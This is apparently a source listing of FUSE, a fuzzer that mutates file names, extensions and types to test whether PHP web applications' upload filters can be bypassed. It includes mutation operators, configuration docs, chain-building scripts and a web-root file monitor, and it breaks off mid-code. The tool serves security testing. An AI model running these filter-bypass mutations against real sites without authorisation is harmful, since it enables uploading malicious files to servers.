9 | __resource__ = {} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | if output['filename'] != None and len(output['filename']) > 0: 14 | filename = output['filename'] 15 | else: 16 | filename = utils.extract_filename(seed_file) 17 | 18 | output['filename'] = filename + '_M12GIF' 19 | 20 | output['fileext'] = 'gif.'+output['fileext'] 21 | -------------------------------------------------------------------------------- /mutation_op/m07.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation 7: Remove extentsion" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | 8 | # XXX: Fill the exclusion operator and seed dependency 9 | __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M07', 'M10', 'M11', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX'], 'html':['M12_HTML','M12_XHTML','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP', 'M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 
'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M07', 'M08', 'M10', 'M11', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX'], 'xhtml':['M12_HTML','M12_XHTML','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M07', 'M08', 'M10', 'M11', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX'], 'js':['M12_HTML','M12_XHTML','M07','M12_GIF','M12_PNG','M12_JPG','M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GPX', 'M12_GZIP', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZHP', 'M12_ZIPX', 'M10', 'M11']} 10 | #other ['M01_GIF', 'M01_JPG', 'M01_PDF', 
'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M10','M06','M08'] # ([classname])when this op used for mutation, 11 | # php ['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] 12 | # operations in this list can be used to extra mutation. 13 | __resource__ = {} # ({type:resource filename}) 14 | __seed_dependency__ = __exclusion_op__.keys()#['html', 'js'] # seed file dependency for operation 15 | 16 | def operation(self, output, seed_file, resource_file=None): 17 | output['fileext'] = '' 18 | if output['filename'] != None and len(output['filename']) > 0: 19 | filename = output['filename'] 20 | else: 21 | filename = utils.extract_filename(seed_file) 22 | output['filename'] = filename + '_M7' 23 | 24 | 25 | -------------------------------------------------------------------------------- /configs/README.md: -------------------------------------------------------------------------------- 1 | # Configuration File 2 | * FUSE uses a user-provided [configuration file](default-credential.conf) 3 | that specifies parameters for a target PHP application. The script must be 4 | filled out before testing a target Web application. 5 | 6 | ##### The [configuration file](default-credential.conf) requires the following fields: 7 | 8 | ###### USER_CREDENTIAL 9 | 1. `ID`: Username for the Web application under testing. 10 | 1. `PW`: Password for the Web application under testing. 11 | 1. `WebRootPath`: Root path for the Web server. 12 | 1. `WebHost`: Host information for the WEb application under testing. 13 | 1. `WebLoginIDName`: Username for the login page. 14 | 1. `WebLoginPWName`: Password for the login page. 15 | 1. 
`WebLoginURL`: The URL for the login processing page. 16 | 1. `WebLoginPageURL`: The URL for the page where the login form exists. 17 | 1. `WebLoginCSRFName`: The name of the CSRF parameter used in the login form. 18 | 1. `WebLoginAdditionalValue`: Names and values of parameters other than ID, PW, and CSRF. 19 | 1. `WebLoginSuccessStr`: String that identifies a successful login on the page returned after login processing. 20 | 1. `WebUploadURL`: The URL for the page that handles the upload request. 21 | 1. `WebUploadPageURL`: The URL for the page where the upload form exists. 22 | 1. `WebUploadFormAttr`: Attribute of the upload form (optional). 23 | 1. `WebUploadCSRFName`: The name of the CSRF token parameter used for upload. 24 | 1. `WebUploadSuccessStr`: String that identifies a successful upload. 25 | 1. `WebUploadAdditionalValue`: Names and values of additional parameters used for upload. 26 | 1. `WebUploadCustomHeader`: Header information used for upload. 27 | 1. `WebUploadedFileUrlPattern`: File to be uploaded. 28 | 1. `WebUploadFilesURL`: The URL for the summary page of the uploaded file. 29 | 1. `WebUploadFilesParameter`: Additional parameters needed to access the summary page of the uploaded file. 30 | 31 | ###### DETECTOR_CONF 32 | 33 | 1. `MutationChainLimit`: Maximum length of a mutation chain. 34 | 1. `MonitorEnable`: Whether to use File Monitor. 35 | 1. `MonitorHost`: Host address for File Monitor. 36 | 1. `MonitorPort`: Port for File Monitor. 37 | 38 | * Custom Tag: 39 | To support various applications, there are tags that can be used in specific parts of the configuration file. Different custom tags are available for each configuration attribute. 40 | 41 | 42 | ``` 43 | WebLoginCSRFName 44 | WebUploadCSRFName 45 | 46 | %cookietoken# 47 | => Get all name and value pairs of cookies and place them in this location. 
48 | 49 | %headertoken:html_tag@[Tag Type]=[Tag Name]=[Tag Value]=[Get Attr Name]=[Header Name]# 50 | => In the UploadPage, search for a tag of the [Tag Type] type with the attribute name [Tag Name] and the value [Tag Value]. Among them, the value corresponding to [Get Attr Name] is added to the HTTP Request [Header Name] header. 51 | 52 | %headertoken:html_regex@[Regex1]=[Regex2]=[Header Name]# 53 | => Find the string corresponding to regular expression [Regex2] among the values retrieved by the [Regex1] from the UploadPage, and use it as the value of [Header Name] name in request header. 54 | 55 | %headertoken:header@[headername]# 56 | => Insert the [headername] header of the HTTP(S) response for UploadPage into the request header. 57 | 58 | %reg:[Regex]# 59 | => In UploadPage, find the tag whose name corresponds to the [Regex] regular expression, and use the tag as name and value pair. 60 | 61 | ---- 62 | 63 | WebLoginPageURL 64 | WebUploadPageURL 65 | 66 | %randint# 67 | => Place a random number at this location. 68 | 69 | %cookie:[cookiename]# 70 | => Place the value corresponding to [cookiename] of the cookie 71 | 72 | %cookie:reg:[regex]# 73 | => Place the value of the parameter whose name matches [regex] in the cookie. 74 | 75 | --- 76 | 77 | WebUploadURL 78 | 79 | %find# 80 | => Find upload form and use action value as upload URL. 81 | 82 | --- 83 | 84 | WebUploadAdditionalValue 85 | 86 | %filename# 87 | => Place the name of the upload file. 88 | 89 | %filebinary# 90 | => Place the content of the upload file. 91 | 92 | %domtoken:[regex1]@[regex2]# 93 | => Place the value corresponding to the regular expression [regex2] in this location among the values retrieved by the [regex1] from the UploadPageURL. 94 | 95 | %randint# 96 | => Place a random number at this location. 97 | 98 | %cookie:[cookiename]# 99 | => The value corresponding to [cookiename] of the cookie. 
100 | 101 | %cookie:reg:[regex]# 102 | => The value of the parameter whose name is matched with [regex] in the cookie. 103 | 104 | --- 105 | 106 | WebUploadedFileUrlPattern 107 | 108 | %genfile# 109 | => Insert a regular expression for the filename generated by FUSE. 110 | 111 | %filename# 112 | => Insert the file name you uploaded. 113 | ``` 114 | 115 | * Test to make sure your configuration is successfully working 116 | ``` 117 | $ python ../tester/login_upload_test.py [config] 118 | 119 | ``` 120 | 121 | -------------------------------------------------------------------------------- /tester/mutation_tester.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import re 4 | import utils 5 | 6 | class mutate_manager: 7 | __op_path__ = './mutation_op/'#'./mutation_op/not_implemented/' 8 | extension = lambda x: x.rsplit('.',1)[1] 9 | __seedList__ = map(extension,os.listdir('./seed/')) 10 | importor = lambda self,x : __import__(self.__op_path__[2:-1]+'.'+x.lower(),fromlist=["{}.{}".format(x,x)]) 11 | file2class = lambda self,x : (x.split('.',1)[0]).upper() 12 | op_dict = {} 13 | 14 | def __init__(self): 15 | op_dir = os.listdir(self.__op_path__) 16 | ops = [] 17 | class_re = re.compile(r'm\d+.*[.]py$') 18 | for i in op_dir: 19 | # File name should always match with m[Number].py 20 | if class_re.match(i): 21 | ops.append(i) 22 | ops = list(set(map(self.file2class,ops))) 23 | for i in ops: 24 | self.op_dict[i] = self.importor(i) 25 | 26 | def combinatedOpList(self,seedtype=None): 27 | opList = {} 28 | if seedtype==None: 29 | for i in self.__seedList__: 30 | opList[i] = self.combinatedOpListFactory(i) 31 | elif seedtype in self.__seedList__: 32 | opList[seedtype] = self.combinatedOpListFactory(seedtype) 33 | else: 34 | print "[-] Given seed type is not exist in seed list" 35 | return None 36 | 37 | return opList 38 | 39 | def combinatedOpListFactory(self,seedtype): 40 | #eqmaker = lambda x : 
# Methods of mutate_manager in tester/mutation_tester.py, followed by the
# module-level write_content helper. The class header and __init__ appear
# earlier in the listing. Indentation was lost in this listing and has been
# reconstructed from the control flow; points where that is a guess are marked.
    def combinatedOpListFactory(self,seedtype):
        """Build the operator combinations usable for one seed type.

        Returns a list of lists of operator names taken from self.op_dict.
        Python 2 semantics are assumed throughout (map() returns a list and
        runs eagerly).
        """
        #eqmaker = lambda x : ('+'.join(x))
        available_op = []
        oplist = []

        # find available op
        for i in self.op_dict.keys():
            if seedtype in self.op_dict[i].mOP.__seed_dependency__ and i != "M0":
                available_op.append([i])

        oplist += available_op # 1R - same with oplist, available_op

        # make list, 2R~
        for aop in available_op: #List(List(Str)) -> List(Str)
            round_templist = []
            for opl in oplist:
                banflag = False
                # NOTE(review): this iterates __exclusion_op__ itself. In the
                # operator shown on this page it is a dict keyed by seed type,
                # and filemutator.py indexes it with [seedtype]; iterating the
                # dict yields seed-type keys, so the exclusion test below
                # would never hit an operator name — confirm and align.
                for banop in self.op_dict[aop[0]].mOP.__exclusion_op__: #List(List
                    if banop in opl:
                        banflag = True
                        break
                if not banflag and aop[0] not in opl:
                    append_op = []
                    append_op += aop
                    append_op += opl
                else:
                    continue
                round_templist.append(append_op)
            # Sort each new combination in place so that permutations of the
            # same operators collapse in the set() below (eager only on Python 2).
            map(list.sort,round_templist)

            oplist += round_templist
        # De-duplicate: lists are unhashable, so go through tuples.
        oplist = map(tuple,oplist)
        oplist = map(list,set(oplist))
        #oplist.insert(0,['M0'])
        return oplist


    def testMutatedData(self, mutation, seed_files):
        """Apply one mutation operator to a seed file and report what changed.

        mutation is a key of self.op_dict; seed_files is a list of seed paths.
        The mutated output is also written to disk through write_content().
        """

        mutator = self.op_dict[mutation].mOP()
        # Only the first declared seed dependency is exercised.
        seed_dep = mutator.__seed_dependency__[0]
        resource_file = None

        # Substring test on the path; seed_file stays unbound if nothing
        # matches, which would raise NameError below.
        for i in seed_files:
            if "." + seed_dep in i:
                seed_file = i
                break

        output = {
            'filename': utils.extract_filename(seed_file),
            'fileext': utils.extract_fileext(seed_file),
            'filetype': utils.extract_filetype(seed_file),
            'content': utils.extract_content(seed_file)
        }

        # Second, independent extraction kept as the pre-mutation baseline.
        origin = {
            'filename': utils.extract_filename(seed_file),
            'fileext': utils.extract_fileext(seed_file),
            'filetype': utils.extract_filetype(seed_file),
            'content': utils.extract_content(seed_file)
        }

        # The operator mutates `output` in place.
        mutator.operation(output, seed_file, resource_file)

        seed_type = seed_file.split(".")[-1]
        write_content(seed_type, output)
        """
        if output['filename'] != origin['filename']:
            print "[+] Mutation succeed ( {} ) - filename".format(mutation)
            return True
        el
        """
        if output['fileext'] != origin['fileext']:
            print "[+] Mutation succeed ( {} ) - fileext( {} -> {} )".format(mutation,origin["fileext"], output["fileext"])
            return True
        elif output['filetype'] != origin['filetype']:
            print "[+] Mutation succeed ( {} ) - filetype( {} -> {} )".format(mutation,origin["filetype"], output["filetype"])
            return True
        elif output['content'] != origin['content']:
            print "[+] Mutation succeed ( {} ) - content( {} b -> {} b )".format(mutation,len(origin["content"]), len(output["content"]))
        elif output['filename'][0] == '.':
            print "[+] Mutation succeed ( {} ) - filename( {} -> {} )".format(mutation,origin["filename"], output["filename"])

            # NOTE(review): placement of this return is a guess. As placed,
            # the content branch prints success but falls through to
            # `return False` — confirm against the repository.
            return True

        return False


def write_content(seed_type, output):
    """Write the mutated content to <seed_type>/<filename>[.<fileext>].

    The directory is relative to the current working directory and is created
    on demand.
    """
    if output['fileext'] == '':
        full_file_name = output['filename']
    else:
        full_file_name = "%s.%s" % (output['filename'], output['fileext'])

    # NOTE(review): nesting reconstructed; as placed, nothing is written for
    # the "php" seed type — confirm.
    if seed_type != "php":
        if not os.path.exists(seed_type):
            os.makedirs(seed_type)
        # The file name comes straight from the mutation output and is not
        # normalised; presumably no operator emits path separators — verify,
        # since one that did would write outside the seed_type directory.
        with open("%s/%s" % (seed_type, full_file_name), "w") as f:
            f.write(output['content'])
f.write(output['content']) 138 | 139 | def get_type_seed_files(types, seed_files): 140 | type_seed_files = [] 141 | for i in seed_files: 142 | # XXX: Maybe we can check file metadata, not use the file extension to 143 | # check their type? 144 | if "." + types in i: 145 | type_seed_files.append(i) 146 | return type_seed_files 147 | 148 | # if you need to find full chain, use this code. 149 | if __name__ == '__main__': 150 | test = mutate_manager() 151 | 152 | seed_files = os.listdir('./seed') 153 | resource_files = os.listdir('./resource') 154 | 155 | seed_files = ['./seed/' + x for x in seed_files] 156 | resource_files = ['./resource/' + x for x in resource_files] 157 | print seed_files 158 | test_op = test.op_dict.keys() 159 | test_op.sort() 160 | print test_op 161 | for i in test_op: 162 | test.testMutatedData(i,seed_files) 163 | -------------------------------------------------------------------------------- /filemutator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import re 4 | import utils 5 | 6 | class mutate_manager: 7 | __op_path__ = './mutation_op/' 8 | extension = lambda x: x.rsplit('.',1)[1] 9 | __seedList__ = map(extension,os.listdir('./seed/')) 10 | importor = lambda self,x : __import__(self.__op_path__[2:-1]+'.'+x.lower(),fromlist=["{}.{}".format(x,x)]) 11 | file2class = lambda self,x : (x.split('.',1)[0]).upper() 12 | op_dict = {} 13 | 14 | def __init__(self): 15 | op_dir = os.listdir(self.__op_path__) 16 | ops = [] 17 | class_re = re.compile(r'm\d+.*[.]py$') 18 | for i in op_dir: 19 | # File name should always match with m[Number].py 20 | if class_re.match(i): 21 | ops.append(i) 22 | ops = list(set(map(self.file2class,ops))) 23 | for i in ops: 24 | self.op_dict[i] = self.importor(i) 25 | 26 | def mutation_op_list(self): 27 | dir_list = os.listdir(self.__op_path__) 28 | mutation_list = [] 29 | for i in dir_list: 30 | if ".py" not in i or ".pyc" in i or "__init__" in 
# Methods of mutate_manager in filemutator.py, followed by the module-level
# get_type_seed_files helper. The class header and __init__ appear earlier in
# the listing. Indentation was lost in this listing and has been reconstructed
# from the control flow.
    def mutation_op_list(self):
        """Return the sorted, upper-cased operator names found in __op_path__.

        A directory entry is skipped when its name lacks ".py" or contains
        ".pyc", "__init__" or "mutation".
        """
        dir_list = os.listdir(self.__op_path__)
        mutation_list = []
        for i in dir_list:
            if ".py" not in i or ".pyc" in i or "__init__" in i or "mutation" in i:
                pass
            else:
                mutation_list.append(i.upper().rsplit('.',1)[0])
        mutation_list.sort()
        return mutation_list

    def mutation_chain(self, base_chain, seed_type, success_list):
        """Return the chains that extend base_chain by one operator.

        base_chain is a '+'-joined string of operator names ('' for none).
        Only operators sorted after the last one in base_chain are candidates.
        success_list holds strings or lists of strings; a candidate chain is
        dropped when it contains a listed string, or every string of a listed
        list (substring tests on the joined chain).

        Raises ValueError (from list.index) when the last operator of
        base_chain is not in mutation_op_list().
        """
        mutation_list = self.mutation_op_list()
        if '+' in base_chain:
            last_op_idx = mutation_list.index(base_chain.rsplit('+',1)[-1])+1
            base_chain = base_chain.split('+')
        elif len(base_chain)<=0:
            last_op_idx = 0
            base_chain = []
        else:
            last_op_idx = mutation_list.index(base_chain)+1
            base_chain = [base_chain]

        op_range = mutation_list[last_op_idx:]
        ret = []
        base_chain_import = {}
        op_range_import = {}
        # Every name is turned into a module import by self.importor.
        # Presumably base_chain only ever holds names produced by this tool —
        # verify callers, since the names select which module gets imported.
        for i in base_chain:
            base_chain_import[i] = self.importor(i)
        for i in op_range:
            op_range_import[i] = self.importor(i)
        for i in op_range:
            # Despite the name, True means the candidate is kept.
            excludedflag = True

            if seed_type not in op_range_import[i].mOP.__seed_dependency__:
                excludedflag = False
            else:
                for ele in base_chain_import.keys():
                    if seed_type not in base_chain_import[ele].mOP.__exclusion_op__.keys():
                        excludedflag = False
                        break
                    elif i in base_chain_import[ele].mOP.__exclusion_op__[seed_type]:
                        excludedflag = False
                        break
            if excludedflag:
                input_mutation = ('+'.join(base_chain)+"+{}".format(i))
                # An empty base chain leaves a leading '+'; strip it.
                if input_mutation[0] == "+":
                    ret.append(input_mutation[1:])
                else:
                    ret.append(input_mutation)
        filtered_ret = []
        for i in ret:
            banflag = False
            for ban in success_list:
                if type(ban) == str and ban in i:
                    banflag = True
                    break
                elif type(ban) == list:
                    hitcount = 0
                    for ban_ele in ban:
                        if ban_ele in i:
                            hitcount += 1
                    if hitcount == len(ban):
                        banflag = True
                        break
            if not banflag:
                filtered_ret.append(i)
        return filtered_ret


    def combinatedOpList(self,seedtype=None):
        """Map seed type -> operator combinations.

        With seedtype=None every entry of __seedList__ is covered. Returns
        None (after printing a message) for a seed type not in __seedList__.
        """
        opList = {}
        if seedtype==None:
            for i in self.__seedList__:
                opList[i] = self.combinatedOpListFactory(i)
        elif seedtype in self.__seedList__:
            opList[seedtype] = self.combinatedOpListFactory(seedtype)
        else:
            print "[-] Given seed type is not exist in seed list"
            return None

        return opList

    def combinatedOpListFactory(self,seedtype):
        """Build the operator combinations usable for one seed type.

        Returns a list of lists of operator names taken from self.op_dict.
        Python 2 semantics are assumed (map() returns a list and runs eagerly).
        """
        available_op = []
        oplist = []

        # find available op
        for i in self.op_dict.keys():
            if seedtype in self.op_dict[i].mOP.__seed_dependency__ and i != "M0":
                available_op.append([i])

        oplist += available_op # 1R - same with oplist, available_op

        # make list, 2R~
        for aop in available_op: #List(List(Str)) -> List(Str)
            round_templist = []
            for opl in oplist:
                banflag = False
                for banop in self.op_dict[aop[0]].mOP.__exclusion_op__[seedtype]: #List(List
                    if banop in opl:
                        banflag = True
                        break
                if not banflag and aop[0] not in opl:
                    append_op = []
                    append_op += aop
                    append_op += opl
                else:
                    continue
                round_templist.append(append_op)
            # Sort each new combination in place so that permutations of the
            # same operators collapse in the set() below.
            map(list.sort,round_templist)

            oplist += round_templist
        # De-duplicate: lists are unhashable, so go through tuples.
        oplist = map(tuple,oplist)
        oplist = map(list,set(oplist))
        return oplist

    def makeMutatedData(self, mutate_list, seed_file, resource_file):
        """Apply the operators in mutate_list, in order, to one seed file.

        Returns the dict with keys 'filename', 'fileext', 'filetype' and
        'content' after all operators have modified it in place.
        """
        output = {
            'filename': utils.extract_filename(seed_file),
            'fileext': utils.extract_fileext(seed_file),
            'filetype': utils.extract_filetype(seed_file),
            'content': utils.extract_content(seed_file)
        }


        # insert specific data for hash
        # Each generated file gets 8 random bytes (16 hex characters) in place
        # of the "%unique#" marker. str.encode('hex') is Python 2 only.
        output['content'] = output['content'].replace("%unique#",os.urandom(8).encode('hex'))


        for mutation in mutate_list:
            mutator = self.op_dict[mutation].mOP()
            mutator.operation(output, seed_file,resource_file)
        # XXX: Finally, use output variable to make request

        return output

def get_type_seed_files(types, seed_files):
    """Return the entries of seed_files whose path contains "." + types."""
    type_seed_files = []
    for i in seed_files:
        # XXX: Maybe we can check file metadata, not use the file extension to
        # check their type?
        # Substring test: it also matches the text in the middle of a path.
        if "." + types in i:
            type_seed_files.append(i)
    return type_seed_files
| type_seed_files = [] 165 | for i in seed_files: 166 | # XXX: Maybe we can check file metadata, not use the file extension to 167 | # check their type? 168 | if "." + types in i: 169 | type_seed_files.append(i) 170 | return type_seed_files 171 | 172 | # if you need to find full chain, use this code. 173 | if __name__ == '__main__': 174 | test = mutate_manager() 175 | OpList = test.combinatedOpList() 176 | 177 | seed_files = os.listdir('seed') 178 | resource_files = os.listdir('resource') 179 | 180 | seed_files = ['seed/' + x for x in seed_files] 181 | resource_files = ['resource/' + x for x in resource_files] 182 | 183 | count = 0 184 | for key in OpList.keys(): 185 | type_seed_files = get_type_seed_files(key, seed_files) 186 | print "{} - {}".format(key,len(OpList[key])) 187 | -------------------------------------------------------------------------------- /filemonitor.py: -------------------------------------------------------------------------------- 1 | import pyinotify 2 | import json 3 | import socket 4 | import threading 5 | import atexit 6 | import time 7 | import hashlib 8 | import os 9 | 10 | MONITOR_PATH='/var/www/html/' 11 | MONITOR_PORT=20174 # Default value for test 12 | EVENT_LIST_LIMITATION=8000 13 | EVENT_LIST = [] 14 | 15 | #Debug = True 16 | Debug = False 17 | 18 | # Todo - Daemonize communication module 19 | 20 | class FileEventHandler(pyinotify.ProcessEvent): 21 | def __init__(self): 22 | self.mutex = threading.Lock() 23 | 24 | def process_IN_ATTRIB(self,event): 25 | if Debug: 26 | print "[IN_ATTRIB] {}".format(event.pathname) 27 | self.mutex.acquire() 28 | if len(EVENT_LIST)>=EVENT_LIST_LIMITATION: 29 | for i in range(0,len(EVENT_LIST)-EVENT_LIST_LIMITATION+1): 30 | EVENT_LIST.remove(EVENT_LIST[0]) 31 | if Debug: 32 | print "[!] 
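# One lock for every reader and writer of EVENT_LIST. The inotify handler and
# the connection thread previously each created their own Lock, so neither
# excluded the other.
EVENT_LIST_LOCK = threading.Lock()


class FileEventHandler(pyinotify.ProcessEvent):
    """Record [path, md5 hex digest] pairs in EVENT_LIST for watched files.

    Only IN_ATTRIB and IN_CREATE have handlers defined here. The code targets
    Python 2, like the rest of this file.
    """

    def __init__(self):
        self.mutex = EVENT_LIST_LOCK

    def process_IN_ATTRIB(self, event):
        """Handle a metadata-change event."""
        self._record_event("IN_ATTRIB", event)

    def process_IN_CREATE(self, event):
        """Handle a creation event."""
        self._record_event("IN_CREATE", event)

    def _record_event(self, label, event):
        """Trim EVENT_LIST to its limit, then append the file behind `event`."""
        if Debug:
            print("[{}] {}".format(label, event.pathname))
        with self.mutex:
            # Drop the oldest entries so the list ends up one below the limit.
            overflow = len(EVENT_LIST) - EVENT_LIST_LIMITATION + 1
            if overflow > 0:
                del EVENT_LIST[:overflow]
                if Debug:
                    print("[!] EVENT_LIST Removed - {}".format(len(EVENT_LIST)))
            if os.path.isdir(event.pathname):
                return
            try:
                # The whole file is read into memory to hash it.
                # NOTE(review): the digest reflects the content at event time;
                # data written after IN_CREATE is only picked up if a later
                # IN_ATTRIB fires — confirm that is acceptable.
                with open(event.pathname, 'rb') as fp:
                    digest = hashlib.md5(fp.read()).hexdigest()
            except EnvironmentError:
                # Best effort: the file may already be gone or unreadable.
                return
            # MD5 is only a fingerprint for matching an upload to a path; it
            # is not collision resistant and must not be read as an integrity
            # guarantee. Changing it would also change what clients send.
            entry = [event.pathname, digest]
            if entry not in EVENT_LIST and os.path.isfile(event.pathname):
                EVENT_LIST.append(entry)
                if Debug:
                    print("[!] Appended - ({}){}".format(digest, event.pathname))


class EventCommunicator(object):
    """One-client, newline-delimited JSON channel over TCP.

    There is no authentication or transport protection on this channel.
    """

    # Upper bound on a single command; a peer that never sends a newline
    # could otherwise grow the receive buffer without limit.
    MAX_COMMAND_BYTES = 65536

    def __init__(self, ip, port):
        self.host = ip
        self.port = port

    def connWait(self):
        """Bind, listen and block until one client connects."""
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # A new listener is created for every client; allow rebinding the
        # port while old connections are still winding down.
        self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.server.bind((self.host, self.port))
        self.server.listen(5)
        self.conn, self.addr = self.server.accept()

    def recv(self):
        """Read one command and return the decoded JSON value, or None.

        None is returned on a socket error, on an oversized command, and when
        the received text is not valid JSON (including an empty read after
        the peer closed the connection).
        """
        recvData = ""
        try:
            while True:
                recvDataPart = self.conn.recv(10)
                if not recvDataPart:
                    break
                recvData += recvDataPart
                # Bytes after the newline in this chunk stay in recvData, so
                # a pipelined second command makes the parse below fail.
                if '\n' in recvDataPart:
                    break
                if len(recvData) > self.MAX_COMMAND_BYTES:
                    print("Error occured during recieving command")
                    return None
        except socket.error:
            print("Error occured during recieving command")
            return None
        if Debug:
            print("[RECV] {}".format(recvData))
        try:
            retData = json.loads(recvData)
        except ValueError:
            print("Error occured during parsing recieved command")
            return None
        return retData

    def send(self, data):
        """JSON-encode `data` and send it followed by a newline."""
        sendData = json.dumps(data)
        # sendall: a plain send() may transmit only part of the buffer.
        self.conn.sendall(sendData + '\n')

    def close(self):
        """Close the client connection and the listening socket."""
        self.conn.close()
        self.server.close()


def eventMonitor(path):
    """Watch `path` recursively and dispatch events to FileEventHandler.

    Blocks in the notifier loop; the script runs it on a daemon thread.
    """
    monitorObj = pyinotify.WatchManager()
    monitorObj.add_watch(path, pyinotify.ALL_EVENTS, rec=True, auto_add=True)

    eventHandler = FileEventHandler()

    notifier = pyinotify.Notifier(monitorObj, eventHandler)
    notifier.loop()


def _reply(connObj, ret_msg):
    """Send one reply; return False (after closing) if the peer is gone."""
    try:
        # send() JSON-encodes again, so the peer receives a JSON string that
        # itself contains JSON. Kept as is: the client is outside this listing.
        connObj.send(json.dumps(ret_msg))
    except socket.error:
        connObj.close()
        return False
    return True


def connectionThread(connObj):
    """Serve lookup commands from one client until it disconnects.

    A command is a JSON object with "type", "filename", "ext" and "filehash";
    type "disconn" ends the session. The reply carries "msg" and "type", plus
    "path" and "hash" on a match; "hash" echoes the value the client sent.

    Any peer that can reach the port can query paths recorded under the
    monitored directory, so network access to it should be restricted.
    """
    while True:
        cmd = connObj.recv()
        ret_msg = {}
        try:
            type_ = cmd["type"]
            if type_ == 'disconn':
                # The original called mutex.test(), which threading.Lock does
                # not provide; the resulting AttributeError was swallowed and
                # the connection was never closed. No lock is held here.
                connObj.close()
                return
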